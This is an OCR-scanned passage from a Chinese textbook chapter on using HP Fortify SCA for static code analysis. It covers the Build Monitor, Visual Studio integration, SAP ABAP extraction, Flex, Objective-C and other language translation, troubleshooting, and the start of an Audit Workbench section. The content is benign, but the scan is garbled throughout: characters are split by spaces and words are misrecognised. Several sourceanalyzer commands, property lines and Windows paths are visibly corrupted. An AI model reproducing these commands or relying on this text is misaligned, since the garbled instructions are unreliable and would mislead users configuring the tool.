d) 检查 是 否 已 成 功 完 成 构建 。 

e) 返回 Fortify Build Monitor 窗口 ， 然 后 单 击 Build Done (构建 完成 )。 

f) Fortify SCA 会 将 结果 输出 到 一 个 子 文件 夹 中 , 请 为 该 输出 文件 夹 指定 名 称 。 如 果 该 文 
件 夹 已 经 存在 ， 则 Fortify SCA 会 在 开始 扫描 之 前 清理 该 文件 夹 。 

g) 单 击 Scan (扫描 )。 

Fortify SCA 会 显示 结果 并 将 其 存储 在 指定 文件 夹 下 的 一 个 FPR 文件 中 。 

注意 : 要 查看 结果 ， 可 在 Audit Workbench 平台 或 者 使 用 Microsoft Visual Studio 安全 编 
码 包 打开 该 FPR 文件。 

。 监视 项 目的 示例 

此 示例 是 Windows 用 户 对 名 为 qwik-smtpd 的 C++ 代码 项 目 示例 进行 分 析 。 此 示例 使 用 
T Microsoft Visual Studio 和 Fortify Build Monitor. 

分 析 qwik-smtpd 项 目 : 

a) 使 用 Microsoft Visual Studio, 打开 并 构建 Tutorials/C/source 目录 下 的 qwik-smtpd 项 目 。 

b) 选择 “开始 ” 然后 依次 选择 “所 有 程序 ”和 Fortify Software - Fortify SCA - Build 
Monitor。 

c) 单 击 Monitor (监视 器 )。 

d) 将 该 窗口 最 小 化 。 

e) 在 Microsoft Visual Studio 中 ， 重 新 构建 该 项 目 。 

注意 : 由 于 项 目 中 没有 发 生 任何 变化 ， 因 此 必须 使 用 重新 构建 选项 。 

f 检查 是 否 已 成 功 完成 构建 。 

g) 返回 Fortify Build Monitor 窗口 ， 然 后 单 击 Build Done (构建 完成 )。 

h) 指定 构建 输出 的 位 置 。 

i) 单 击 Scan (扫描 )。 

Fortify SCA 会 在 指定 的 文件 夹 下 保存 一 个 FPR 文件 。 

注意 : 要 查看 结果 ， 请 在 Audit Workbench 平台 或 者 使 用 Microsoft Visual Studio 安全 编 
码 包 打开 该 FPR X ff. 


T. Visual Studio .NET 

如 果 使 用 Visual Studio NET 来 执行 命令 行 构建 ， 只 要 通过 封装 构建 命令 行 并 调 ) 
sourceanalyzer， 即 可 轻松 集成 source code analysis。 为 此 ， 必 须 在 Visual Studio 版 本 中 安装 一 
个 Fortify 安全 编码 插件 。 


*。174。 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


观察 以 下 示例 : 
sourceanalyzer -b my buildid devenv /REBUILD MyProject.sln 


它 在 Visual Studio 构建 的 所 有 文件 中 执行 转换 阶段 。 务 必 进 行 清除 或 重新 构建 ， 确 保 将 
所 有 文件 都 包含 在 内 。 
8. Visual Studio 6.0 


如 果 用 Visual Studio 6.0 来 执行 命令 行 构建 , 可 通过 封装 构建 命令 行 并 调用 sourceanalyzer 
来 集成 source code analysis。 
观察 下 面 这 个 例子 : 


sourceanalyzer -bmy buildid msdev MyProject.dsp /MAKE "MyProject DEBUG"/REBUILD 


这 会 对 Visual Studio 构建 的 所 有 文档 都 执行 转换 操作 。 正 如 Visual Studio 文档 中 所 描述 
的 ， 为 将 所 有 文件 都 包含 在 内 ， 务 必要 进行 清除 或 重新 构建 。 


5.6.5 ”转换 ABAP/4 


1. 关于 转换 ABAP/4 代码 


翻译 ABAP/4 代码 类 似 于 翻译 其 他 操作 语言 的 代码 , 但 需要 额外 的 步骤 从 SAP 数据 库 中 
提取 代码 ， 并 准备 将 其 扫描 。 本 章 假设 SCA 正在 运行 ， 并 且 读 者 对 SCA. SAP 和 ABAP/4 
有 一 个 基本 了 解 。 

2. 扫描 ABAP 代码 


当 一 个 包 从 ABAP 被 提取 出 来 ，HP Fortify 的 ABAP 提取 器 用 与 包 名 匹配 的 parentcl 域 
从 TDEVC 中 提取 所 有 数据 ， 然 后 把 提取 出 的 数据 作为 parentcl 域 ， 和 之 前 一 样 再 递归 从 
TDEVC 提取 相关 所 有 数据 。 从 TDEVC 提取 的 这 个 字段 称 为 devclass。DEVCLASS 值 被 视 
为 一 组 程序 名 ， 并 与 其 他 程序 名 一 样 执行 相关 的 操作 。 

程序 是 通过 匹配 名 称 域 从 TRDIR 提取 得 到 ， 该 名 称 域 可 能 是 用 户 在 选择 屏幕 中 提供 的 
程序 名 得 到 , 也 可 能 通过 与 来 自 TDEVC 提取 的 值 的 列表 作对 比 得 到 (如 果 提 供 了 一 套 给 定 的 
匹配 名 称 字 段 中 的 程序 名 称 )。 从 TRDIR 获得 的 行 就 是 那些 名 称 域 , 它们 具有 像 programname 
的 程序 名 称 ， 名 称 域 的 作用 是 继续 提取 行 。 最 终 名 单 是 READ REPORT 用 于 从 SAP 系统 获 
取代 码 。 此 方法 仅 从 REPORTS 读 取 类 和 方法 。 

每 个 READ REPORT 调用 产生 一 个 文件 ,此 文件 在 本 地 系统 上 的 临时 文件 夹 中 。 这 组 文 
件 由 源 分 析 器 翻译 和 扫描 ， 产 生 可 被 HP Fortify 的 Audit Workbench 查看 的 FDR 文件 。 

当 源 代码 下 载 完 成 ，HP Fortify 的 ABAP 提取 器 会 检查 INCLUDE 描述 语句 。 被 发 现时 ， 
它 也 会 将 INCLUDE 内 容 下 载 到 本 地 计算 机 进行 分 析 。 

3. 过 程 概述 


在 翻译 ABAP/4 代码 之 前 需要 以 下 两 个 主要 步 又 : 
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* 在 SAP 服务 器 上 安装 一 个 传输 请 求 ， 在 这 个 步骤 中 ， 将 安装 HP Fortify 的 提取 程序 ; 

。 创建 一 个 事务 对 象 。 

4. 传输 请 求 

ABAP 扫描 可 作为 SCA 的 高 级 功能 ， 如 果 购 买 了 包含 此 功能 的 许可 证 ， 需 要 在 SAP 服 
务 器 上 安装 HP Fortify 的 传输 请 求 , 请 联系 HP Fortify 技术 支持 部 门 获取 一 份 惠普 传输 请 求 或 
相关 信息 的 副本 ， 在 SCA 的 许可 副本 中 再 添加 这 个 功能 。 

5. 创建 事务 对 象 

将 需要 为 推出 一 个 SCA 扫描 创建 一 个 事务 对 象 。 按 下 面 的 步骤 来 创建 一 个 事务 对 象 。 

1) 按 Esc 键 ， 直 至 到 达 SAP 轻松 访问 屏幕 ， 并 键入 se93. Maintain Transaction 界面 出 
现 ， 如 图 5-24 所 示 。 


区 Maintain Transaction 
€ "4H CRA ome anama 命 国 
Maintain Transaction 
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Transaction Code 
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图 5-24 Maintain Transaction 界面 


2) 在 事务 代码 框 中 键入 Z AMOL SCA 并 单 击 Create 按钮 。 将 出 现 Create. Transaction 
对 话 框 ， 如 图 5-25 所 示 。 


Create Transachon 


Transaction code 


Transaction attributes 
Shorttext Launch SCA 


Start object. 
(Program and screen (dialog transaction) 
(*)Program and selection screen (report transaction) 


(Method of a class (OO transaction) 
(Transaction with variant (variant transaction) 
Transaction with parameters (parameter transaction) 


5-25 Create Transaction 界面 
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3) 在 Transaction attributes 部 分 ， 在 短文 本 框 中 输入 事务 (例如 : 运行 SCA) 目 标的 简短 说 明 。 
4) 在 Start object 部 分 ， 选 择 程序 和 选择 屏幕 (报告 交易 ) 单 选 按钮 。 
5) 单 击 绿色 的 对 号 按钮 ， 出 现 Create Report Transaction 屏幕 ， 如 图 5-26 所 示 。 


m Create Report Transaction amv» 
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Create Report Transaction 
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Transaction code Z AHOL SCA $ 
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Program [a 
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©Professional User Transaction. 

JEasy Web Transaction Serice E 


The object will be created in the original language English (EN) 


图 5-26 Create Report Transaction 界面 


6) 在 Package 文本 框 中 键入 STMP。 

注意 ， 如 果 Package 框 不 可 编辑 ， 请 空 着 ， 在 之 后 的 界面 可 和 输入 Package 详细 信息 。 

7) 在 Program 框 输入 程序 名 称 (例如 Z_AMOL SCA) 

8) 在 图 像 支持 部 分 ， 选 择 所 有 三 个 复 选 框 。 

9) 单 击 工具 栏 上 的 Save。 Create Object Directory Entry 界面 会 显示 出 来 , 如 图 5-27 所 示 。 
注意 : 如 果 未 在 Package 字段 中 输入 一 个 屏幕 中 包 的 详细 信息 ， 请 键入 $ TMP。 

10) 单 击 Save 按钮 。 
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图 5-27 Create Object Directory Entry 界面 
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6. 将 Fortify SCA 加 入 收藏 列表 

将 Fortify SCA 添加 到 收藏 夹 列 表 是 可 选项 , 但 这 样 做 可 能 会 更 便捷 地 进入 和 启动 Fortify 
SCA 扫描 。 下 面 的 步骤 假定 是 日 常 使 用 的 用 户 菜单 。 如 果 是 从 不 同 菜单 进行 ， 将 收藏 夹 链接 
添加 到 使 用 的 菜单 。 再 创建 的 Fortify SCA 项 目 ，SAP 服务 器 将 在 基于 Web 的 客户 端的 SAP 


轻松 访问 区 域 运行 。 
1) ASAP 轻松 访问 菜单 ， 在 会 话 框 键入 S000, SAP 菜单 出 现 。 
2) 右 击 “favorite file", 选择 插入 会 话 。Manual 
entry of a transaction 框 出 现 ， 如 图 5-28 所 示 。 TE Manca anty ora transaction 


| Transaction Code 区 


3) 在 会 话 代码 框 键入 Z_AMOL SCA. 

注意 : 如 果 创建 交易 代码 时 选择 了 不 同 的 名 
称 ， 请 使 用 这 个 名 称 。 

4) 单 击 绿色 对 号 按钮 ， 运 行 SCA 选项 出 现 
在 收藏 列表 中 ， 如 图 5-29 所 示 。 


Œ SAP Easy Access 


图 5-28 Manual entry of a transaction 界面 
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图 5-29 ”收藏 列表 界面 


单 击 link 启动 SCA， 如 图 5-30 所 示 。 
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图 5-30 Invoke Fortify SCA 
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7. 运行 HP Fortify ABAP Extractor 


1) 从 Favorites 链接 运行 程序 (交易 代码 ) ， 或 手动 启动 Z AMOL SCA 对 象 ， 如 图 5-31 
所 示 。 


区 HP Fortify ABAP Extractor 
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图 5-31 HP Fortify ABAP Extractor 


2) 填写 所 要 求 的 信息 ， 如 表 5-3 所 示 。 


表 5-3 要 求 填写 的 信息 
部 分 数据 
LES 输入 想 要 扫描 的 软件 组 件 、 包 、 程 序 、BSP 或 Web Dynpro 组 件 名 


FPR 文件 路 径 : 输入 想 要 存储 的 FPR 文件 路 径 ， 包 括 要 指定 的 FPR 文件 名 称 
工作 目录 : 输入 提取 的 源 代码 所 在 的 目录 并 复制 此 目录 

HED: 输入 构建 了 D 为 扫描 

转换 参数 : 列 出 所 有 可 选 源 分 析 器 转换 参数 

扫描 参数 : 列 出 所 有 可 选 源 分 析 器 扫描 参数 

ZIP 文件 名 : 如 果 需 要 压缩 包 提供 输出 ， 则 和 输入 一 个 ZP 文件 名 


源 分 析 器 参数 
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( 续 表 ) 
部 分 数据 
Fd. 选中 此 复 选 框 以 指示 SCA FRA SAP 数据 库 中 提取 的 源 代码 
建设 : 选中 此 复 选 框 用 符号 指示 SCA 
扫描 : 勾 选 此 项 ， 要 求 扫描 
启动 AWB: 选中 此 复 选 框 来 启动 审计 工作 台 并 加 载 FPR 
创建 ZIP: 选中 此 复 选 框 ， 要 求 输出 是 压缩 格式 
过 程 中 背景 :选中 此 复 选 框 以 处 理发 生 在 后 台 的 请 求 


动作 


3) 单 击 执行 按钮 。 
5.6.6 转换 FLEX 


1. 命令 

下 面 列 出 命令 行 选项 : 

-flex-sdk-root(com fortify.sca.FlexSdkRoot) 应 指向 一 个 有 效 的 Flex SDK 的 根 。 此 文件 夹 应 

JA flex-config.xml 的 一 个 框架 文件 夹 。 它 也 应 该 包含 一 个 bin 文件 夹 (包含 一 个 mxmlc 可 执 

行文 件 )。 用 户 可 在 -sca.properties 文件 中 设置 此 属性 。 

-flex-libraries(com.fortify.sca.FlexLibraries) 包 含 “: ”或 “; ”分 隔 的 列表 (“: ”为 大 多 数 
平台 ,“; ”为 Windows 平台 ) 上 要 “链接 ”到 库 的 名 称 。 大 多 数 情况 下 ,该 列表 包括 flex.swc、 
framework.swc 和 playerglobal.swc( 通 常 在 Flex SDK 根 目录 下 的 frameworks/libs/)。 用 户 可 在 
-sca.properties 文件 中 设置 此 属性 来 使 用 SWC 的 相同 设置 。 

注意 ; 用 户 可 指定 SWC 或 SWF 文件 作为 Flex 库 ， 但 目前 不 支持 SWZ. 

-flex-source-roots(com fortify.sca.FlexSourceRoots) 包 含 “: ”或 “;”， 在 MXML 源 都 可 以 
找到 根 目录 中 分 隔 的 列表 。 通 常情 况 下 ， 这 些 都 将 包含 一 个 名 为 com 的 子 文件 夹 。 例 如 ， 如 
果 一 个 Flex 源 指向 foo/bar/sre 目录 , 则 foo/bar/src/com/fortify/manager/util/Foo.mxml 将 得 到 一 
个 名 为 com fortify managerutilFoo 的 对 象 (在 com.fortify. manager util 包 中 的 名 为 Foo 的 对 象 )。 

-flex-sdk-root 和 -flex-source-roots 主要 用 于 MXML 编译 ， 并 且 为 可 选 ， 如 果 你 扫描 纯 
ActionScript. -flex-libraries 用 于 解决 所 有 的 ActionScript. 

注意 : MXML 文件 被 翻译 成 ActionScript， 然 后 通过 动作 脚本 解析 器 运行 。 所 生成 的 
ActionScript 旨 在 进行 简单 分 析 ， 不 会 严格 纠正 ， 如 Flex 的 运行 时 模型 。 由 于 这 一 结果 ， 可 
能 会 得 到 MXML 文件 解析 错误 。 例 如 ，XML 解析 可 能 会 失败 ， 翻 译 为 ActionScript 可 能 会 
失败 ， 以 及 由 此 产生 的 ActionScript 的 解析 也 可 能 会 失败 。 如 果 发 现任 意 与 源 代码 无 关 的 错 
误 ， 请 通知 HP Fortify 的 技术 支持 部 门 。 

2. ActionScript 命令 行 语 法 

执行 ActionScript 的 基本 命令 行 语法 是 : 


sourceanalyzer -b «build id» -flex-libraries <listOfLibraries> 
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要 将 文件 直接 传递 到 Fortify SCA， 请 输入 : 


sourceanalyzer -b «build id» -flex-libraries «listOfLibraries» 


3. ActionScript 命令 行 举 例 

例子 1 

下 面 的 例子 是 只 包含 一 个 MXML 文件 和 单个 SWF 库 (MyLib.swg) 的 简单 应 用 。 

sourceanalyzer -b MyFlexApp -flex-libraries lib/MyLib.swf -flex-sdk-root 
/home/myself/ flex-sdk/ -flex-source-roots.my/app/FlexApp.mxml 

以 上 标识 库 的 位 置 , 包括 并 确定 了 Flex SDK 和 Flex 源 的 根 目录 位 置 。 这 个 位 于 /my/app/ 
FlexApp.mxml 的 独立 MXML 文件 被 转换 成 位 于 my.app 包 下 名 为 FlexApp 的 一 个 独立 
ActionScript 类 。 


例子 2 

下 面 的 例子 是 在 源 文件 是 相对 于 src 目录 的 应 用 程序 。 它 使 用 一 个 单一 的 SWF 库 
MyLib.swf， 以 及 Flex 和 Flex SDK 的 框架 库 。 

sourceanalyzer -b MyFlexProject -flex-sdk-root /home/myself/flex-sdk/ 
-flex-sourceroots src/ -flex-libraries lib/MyLib.swf src/**/*.mxml src/**/*.as 

在 这 个 例子 中 ,实现 定位 Flex SDK. SCA 文件 说 明 符 用 来 包含 sre 文件 夹 下 的 .as 和 mxml 
文件 。 这 指定 在 -flex-sdk-root 下 没 必要 显 式 指出 的 .swf 文件 。 但 本 例 做 法 是 为 了 进行 说 明 。 
SCA 会 自动 定位 所 有 Flex SDK 根 目录 下 的 .swe 文件 ， 并 假定 这 些 都 虽 在 用 于 翻译 的 
ActionScript 或 mxml 文件 。 

例子 3 

在 这 个 例子 中 ，Flex SDK 的 根 和 了 lex 库 在 属性 中 被 指定 ， 因 为 输入 数据 文件 非常 耗 时 ， 
该 应 用 程序 可 分 成 并 保存 为 两 部 分 ， 一 个 主要 部 分 文件 夹 和 一 个 模块 文件 夹 。 每 个 文件 夹 应 
包含 其 开始 路 径 的 src 文件 夹 。 使 用 通配符 的 文件 规范 获取 所 有 .mxml 和 .as 文件 。 
main/src/com/foo/util/Foo.mxml 将 被 转换 为 包 com.foo.util 中 名 为 Foo 的 一 个 ActionScript 类 ， 
例如 ， 用 在 此 处 指定 的 源 根 目 录 : 


sourceanalyzer -b MyFlexProject -flex-source-roots main/src:modules/src./main/ 
Src/**/ *.mxml ./main/src/**/*.as ./modules/src/**/*.mxml ./modules/src/**/*.as 


4. 处 理 警 告 
要 查看 构建 过 程 中 生成 的 所 有 警告 ， 启 动 扫描 之 前 请 输入 以 下 命令 : 
sourceanalyzer -b «build id» -show-build-warnings 


可 能 会 收 到 类 似 的 消息 : 


The ActionScript front end was unable to resolve the following imports: a.b 
at y.as:2. foo.bar at somewhere.as:5. a.b at foo.mxml:8. 
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当 SCA 无 法 找到 所 有 需要 的 库 , 会 发 生 此 错误 。 可 能 需要 指定 额外 的 swf 与 swfFlex PE 
(-FLEX-libraries 选项 ， 或 com.fortify.sca.Flex 库 属性 )， 使 SCA 可 以 完成 分 析 。 


5.6.7 ”转换 移动 平台 代码 


1. 转换 Objective-C 代码 
1) Objective-C 命令 行 语法 
。 用 于 转换 单个 文件 中 的 基本 命令 行 语法 


sourceanalyzer -b <build id><compiler> [<compiler options>] -clean 
sourceanalyzer -b <build id><compiler> [<compiler options>] 


<compiler> 是 生成 项 目的 扫描 过 程 中 使 用 的 编译 器 名 。 要 扫描 完整 的 Xcode 项 目 ， 可 以 
J xcodebuild 作为 编译 器 。 扫 描 单 独 的 源 文件 ， 可 通过 clang 或 llvm-gcc 作为 编译 器 。 
<compiler options> 是 通常 用 于 编译 文件 的 编译 器 选项 。 
2) Objective-C 命令 行 例子 
下 面 的 简单 例子 说 明了 所 支持 的 编译 器 的 使 用 模式 。 下 面 的 命令 应 当 在 项 目 文件 所 在 的 
目录 下 运行 。 
使 用 Xcode 编译 器 转换 名 为 myproject 的 工程 ， 请 输入 : 


sourceanalyzer -b my buildid xcodebuild -sdk iphonesimulator -clean 
sourceanalyzer -b my buildid xcodebuild -sdk iphonesimulator 


如 果 你 有 苹果 开发 者 证 书 ， 传 递 -sdk iphoneos 而 不 是 -sdk iphonesimulator。 
使 用 gcc 编译 器 转换 名 为 HelloWorld.m 的 文件 ， 请 输入 : 


sourceanalyzer -b my buildid llvm-gcc -x objective-c HelloWorld.m -clean 
sourceanalyzer -b my buildid llvm-gcc -x objective-c HelloWorld.m 


使 用 clang 编译 器 转换 名 为 HelloWorld.m 的 文件 ， 请 输入 : 


sourceanalyzer -b my buildid clang -ObjC HelloWorld.m -clean 
sourceanalyzer -b my buildid clang -ObjC HelloWorld.m 


。 扫描 应 用 程序 文件 

sourceanalyzer -b my buildid -scan -f result.fpr 
注意 ， 运 行 这 些 命令 时 ， 源 代码 将 被 编译 。 

。 Xcode 编译 器 错误 


如 果 收 到 Xcode 编译 器 错误 , 这 可 能 是 由 于 SCA 新 版 本 新 增 clang 选择 的 原因 。 为 消除 
这 些 错误 ， 键 入 xcodebuild 之 后 执行 以 下 操作 : 


ARCHS=i386. GCC TREAT WARNINGS AS ERRORS=NO 


其 中 的 ARCH=386 表示 架构 (ABI 的 处 理 器 型 号 ) 的 二 进 制 接口 。 
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2. iPhone 上 的 Objective-C 

如 果 构 建 为 Phone 代码 ,将 需要 根据 是 否 持 有 一 个 苹果 开发 者 证 书 来 通过 一 个 SDK 选项 。 
如 果 有 苹果 开发 者 证 书 ， 通 过 SDK 的 iPhoneOS。 

如 果 没 有 苹果 开发 者 证 书 ， 通 过 SDK iphonesimulator. 

3. 转换 Google Android 代码 

SSR 提供 了 支持 谷歌 Android 平台 上 运行 的 程序 规则 。 这 些 规则 如 下 : 

e 可 识别 不 安全 的 数据 存储 ; 

。 可 进行 安全 权限 分 类 ， 可 检测 overprivileged 用 途 。 

根据 发 送 和 接收 的 意图 ， 识 别 数据 库 、 文 件 系 统 、 网 络 、 私 人 信息 和 Android 组 件 。 


5.68 ”转换 其 他 语言 


1. 适用 于 其 他 语言 的 命令 行 语法 
适用 于 其 他 语言 的 基本 命令 行 语法 是 : 
sourceanalyzer -b «build id><file list» 


SQL 注释 默认 情况 下 ， 在 Windows 平台 上 ， 会 将 扩展 名 为 .sql 的 文件 视 为 工 SQL， 
而 不 是 PL/SQL。 如 果 正 在 使 用 Windows 平台 ， 并 且 具 有 扩展 名 为 .sql 的 PL/SQL 文件 ， 则 
应 该 配置 Forify SCA 使 其 将 这 些 文件 视 为 PL/SQL。 要 更 改 此 默认 行为 ， 可 将 
fortify-sca.properties 中 的 com.fortify.sca.fileextensions.sgl 属性 设置 为 TSQL 或 PLSQL。 
输入 以 下 语句 以 便 对 ColdFusion 源 代码 执行 转换 : 


sourceanalyzer -b <build -id> -source-base-dir <dir><files|filespecifiers> 


其 中 : 

。 <build id> 指 定 构建 项 目的 ID。 

。 -dirJ&;E Web 应 用 程序 的 根 目 录 。 

* <fileslfile specifiers> 指 定 CFML 源 代码 文件 。 

ColdFusion 注释 : Fortify SCA 将 通过 使 用 -source-base-dir 目录 作为 起 始点 ， 计 算出 每 个 
CFML 源 文件 的 相对 路 径 ， 然 后 在 生成 实例 ID 时 使 用 这 些 相 对 路 径 。 即 便 将 整个 应 用 源 树 
移动 到 另 一 个 目录 ， 如 果 为 -source-base-dir 指定 了 一 个 适当 值 ， 通 过 安全 分 析 生 成 的 实例 TD 
也 应 该 会 保持 不 变 。 

表 5-4 显示 出 了 各 种 文件 说 明 符 。 

表 5-4 文件 说 明 符 
H xh 
在 指定 目录 或 子 目录 下 找到 的 所 有 文件 
在 指定 目录 或 子 目录 下 找到 的 任何 名 为 Examplejs 的 文件 


文件 说 明 符 


<dimame> 
<dimame>/**/Example.js 
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( 续 表 ) 
文件 说 明 符 ii 
-dimame-/* js 在 指定 目录 下 找到 的 任何 带 有 扩展 名 js 的 文件 
-dimame-/**/* js 在 指定 目录 或 子 目录 下 找到 的 任何 带 有 扩展 名 js 的 文件 
<dimame>/**/* 在 指定 目录 或 子 目 录 下 找到 的 所 有 文件 (与 <dimame> 相 同 ) 


注意 : Windows 及 许多 UNIX shell 会 自动 尝试 展开 含有 * 字符 的 参数 ， 因 此 应 当 使 用 
文件 说 明 符 表达 式 。 而 有 全， 在 Windows "P. BEAR HE) 而 不 是 正 儿 杠 (/)。 

2. 其 他 语言 命令 行 示例 

。 转换 PL/SQL 的 示例 

以 下 示例 显示 了 转换 两 个 PL/SQL 文件 的 语法 : 

sourceanalyzer -b MyProject x.pks y.pks 

以 下 示例 显示 了 如 何 转换 sources 目录 下 的 所 有 PL/SQL 文件 : 

sourceanalyzer -b MyProject "sources/**/*.pks" 

。 转换 工 SQL 的 示例 

以 下 示例 显示 了 转换 两 个 工 SQL 文件 的 语法 : 

sourceanalyzer -b MyProject x.sql y.sql 

以 下 示例 显示 了 如 何 转换 sources. 目录 下 的 所 有 工 SQL 文件 : 

sourceanalyzer -b MyProject "sources\**\*.sql" 

注意 : 此 示例 假定 fortify-sca.properties 文件 中 的 com fortify sca.fileextensions.sql 属性 设 
置 为 "TSQL"。 

。 转换 PHP 的 示例 

要 转换 名 为 MyPHPphp 的 单个 文件 ， 可 输入 : 

sourceanalyzer -b mybuild "MyPHP.php" 

。 转换 用 VBScript 语言 编写 的 Classic ASP 的 示例 

要 转换 名 为 MyASPasp 的 单个 文件 ， 可 输入 : 

sourceanalyzer -b mybuild "MyASP.asp" 

。 转换 JavaScript 的 示例 

要 转换 scripts 目录 下 的 所 有 JavaScript 文件 ， 可 输入 : 

sourceanalyzer -b mybuild "scripts/*.js" 


。 转换 VB 4.0 脚本 文件 的 示例 
要 转换 名 为 myApp.vb 的 VB 4.0 文件 ， 可 输入 : 
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Sourceanalyzer -b mybuild "myApp.vb" 


e 转换 ColdFusion 的 示例 
以 下 示例 显示 了 用 于 转换 两 个 CFML 文件 的 语法 : 


sourceanalyzer -b MyProject -source-base-dir .Pagel.cfm Page2.cfm 


以 下 示例 显示 了 如 何 转换 CAMySite 目录 下 的 所 有 CFML 文件 : 


Sourceanalyzer -b MySite -source-base-dir C:MMySite "C: MMySiteMV**N*.cfm" 


5.69 故障 排除 与 支持 


1. 故障 排除 


1) 使 用 日 志文 件 调试 问题 

如 果 在 运行 Fortify SCA. 时 遇 到 警告 或 者 问题 , 可 使 用 -debug 选 项 再 次 运行 Fortify SCA。 
这 会 在 以 下 目录 中 生成 一 个 名 为 sca.log 的 文件 : 

* 在 Windows F-E: C:\Documents and Settings\<usemame>\LocalSettings\Application 

Data\Fortify\sca5.0\log 

* 在 其 他 平台 上 : SHOME/.fortify/sca5.0/log 

将 sca.log 文件 压缩 为 zip 文件 ， 通 过 电子 邮件 发 送 至 technicalsupport@fortify.com 以 便 
进行 进一步 研究 。 


2) 转换 失败 的 消息 

如 果 C/C++ 应 用 程序 构建 成 功 , 但 当 使 用 Fortify SCA 进行 构建 时 却 看 到 一 条 或 多 条 “ 转 
换 失败 ”消息 ， 此 时 ， 请 编辑 <install_directory>/Core/config/fortify-sca.properties 文件 ， 将 以 下 
命令 行 : 


com.fortify.sca.cpfe.options- --remove unneeded entities --suppress vtbl 


修改 为 : 


com.fortify.sca.cpfe.options--w --remove unneeded entities --suppress vtbl 


重新 执行 构建 ， 输 出 转换 器 遇 到 的 错误 。 如 果 输 出 的 结果 表明 编译 器 与 Fortify 转换 器 
之 间 存 在 冲突 ， 可 将 输出 发 送 给 Fortify 技术 支持 部 门 ， 以 便 进 行进 一 步 的 研究 。 


3) JSP 转换 问题 

Fortify SCA 使 用 内 署 的 或 特定 应 用 程序 服务 器 的 JSP 编译 器 将 JSP 文件 转换 为 Java 文 
件 以 进行 分 析 。 如 果 在 Fortify SCA 将 ISP 文件 转换 为 Java 文件 以 进行 分 析 的 过 程 中 ，JSP 
分 解 器 遇 到 问题 ， 会 看 到 如 下 的 消息 : 

Failed to translate the following jsps into analysis model.Please see the log 


file for any errors from the jsp parser and the user manual for hintson fixing 
those. 
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«List of JSP file names» 


此 问题 通常 由 以 下 一 个 或 多 个 原因 造成 : 

* Web 应 用 程序 的 布局 方式 不 是 适当 的 可 部 署 WAR 目录 格式 ; 

。 缺少 应 用 程序 所 需 的 某 些 JAR 文件 或 类 ; 

。 应 用 程序 中 缺少 某 些 标签 库 或 者 其 定义 (TLD)。 

要 获取 更 多 关于 这 个 问题 的 信息 ， 请 执行 以 下 步 又: 

a) 在 编辑 器 中 打开 Fortify SCA 日 志文 件 。 

b) 搜索 字符 串 Jsp parser stdout 和 Jsp parser stderr: o 

这 些 错误 由 所 用 的 JSP 分 析 器 生成 。 请 先 解决 这 些 错误 ， 然 后 重新 运行 Fortify SCA。 


4) ASPX 转换 问题 

Fortify SCA 会 将 ASPX 文件 编译 为 DLL 文件 以 进行 分 析 ， 如 下 所 示 : 

如 果 使 用 的 是 NET 2.0( 或 更 高 版 本 ) 和 Visual Studio 2005， 请 使 用 Microsoft aspnet compile 
编译 器 ; 

如 果 使 用 的 是 NET 1.1 和 Visual Studio 2003， 请 设法 每 次 从 网 站 提取 一 个 ASPX 文件 ; 

如 果 存 在 以 下 问题 ， 编 译 操作 就 会 失败 : 

。 存在 访问 或 认证 问题 ， 导 致 无 法 访问 Web 应 用 程序 ; 

。 缺少 某 些 必要 的 DLL 文件 。 

在 任何 一 种 情况 下 ， 都 会 看 到 类 似 于 以 下 内 容 的 消息 : 

Failed to translate the following aspx files into analysis model.Please see 
the log file for any errors from the aspx precompiler and the user manual for hints 


on fixing those. 
«List of ASPX file names» 


如 果 正 在 使 用 插件 ， 请 启动 插件 调试 ， 并 检查 插件 日 志文 件 中 是 否 存在 由 ASPX 预 编 
译 器 生成 的 错误 。 

如 果 正 在 使 用 命令 行 工 具 fortify_aspnet_compiler， 应 该 会 在 控制 台 上 看 到 错误 消息 。 

如 果 仍 无 法 确定 问题 的 原因 ， 请 尝试 从 浏览 器 中 访问 失败 的 ASPX 文件 ， 看 看 会 显示 哪 
些 问 题 。 如 果 看 到 诸如 cannot locate assembly 之 类 的 消息 ， 请 务必 先 获取 缺少 的 DLL 文件 ， 
然后 重新 运行 Fortify SCA。 

如 果 能 从 浏览 器 中 访问 失败 的 ASPX 文件 ， 但 Forify SCA 仍 无 法 扫描 该 文件 ， 请 与 
Fortify 技术 支持 部 门 联系 以 获得 更 多 帮助 。 


5) C/C++ 预 编译 的 头 文件 

一 些 C/C++ 编译 器 支持 一 种 称 为 “ 预 编译 头 文 件 ” 的 功能 ， 该 功能 可 以 加 快 编译 。 有 些 
编译 器 实现 这 种 功能 后 ， 会 产生 微妙 的 副作用 。 当 激活 这 个 功能 时 ， 编 译 器 可 能 会 不 经 过 警 
告 或 者 报错 就 接受 错误 的 源 代码 。 这 种 情况 下 会 产生 矛盾 : 即使 编译 器 没有 执行 Fortify SCA, 
也 会 报告 转换 错误 。 

如 果 使 用 编译 器 的 预 编译 头 文 件 功能 ， 请 确保 源 代码 在 禁用 预 编译 头 文件 功能 的 情况 下 
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可 以 成 功 编译 并 执行 完整 的 构建 过 程 。 
2. 报告 Bug 和 请 求 加 强 


反馈 对 于 产品 的 成 功 必 不 可 少 。 若 请 求 加 强 功能 或 补丁 ， 或 者 要 报告 bug， 请 发 送 电子 
邮件 至 技术 支持 部 门 : technicalsupport@fortify.com。 

请 务必 在 电子 邮件 正文 中 包含 下 列 信息 : 

产品 : Fortify SCA 

版 本 号 : 要 确定 版 本 号 ， 请 运行 以 下 命令 : sourceanalyzer -version 

平台 : (例如 PC) 

操作 系统 : (例如 Windows 2000) 

当 请 求 加 强 功能 时 ， 请 包含 有 关 加 强 功能 的 描述 。 当 报告 bug 时 ， 请 提供 足够 的 详细 信 
息 以 重 现 该 问题 。 给 出 的 描述 越 详尽 ， 我 们 分 析 和 修复 问题 的 速度 越 快 。 同 时 ， 还 要 提供 自 
问题 发 生 以 来 的 日 志文 件 ， 或 与 问题 相关 的 日 志 内 容 。 


5.7 Audit Workbench 用 户 指南 


5.7.1 Audit Workbench 简介 


1. Audit Workbench 概述 


Audit Workbench 为 Fortify SCA 增加 了 一 个 图 形 用 户 界 面 ， 使 得 开发 组 织 与 安全 审计 小 
组 能 够 迅速 地 对 分 析 结果 进行 组 织 、 调 查 和 划分 优先 级 ， 从 而 在 短 时 间 内 修复 安全 漏洞 。 


1) SCA 阶段 概述 

Audit Workbench 会 启动 Fortify SCA*Scanning( 扫 描 ) 向 导 来 扫描 和 分 析 源 代码 。 该 向 导 
整合 了 以 下 几 个 分 析 阶 段 : 

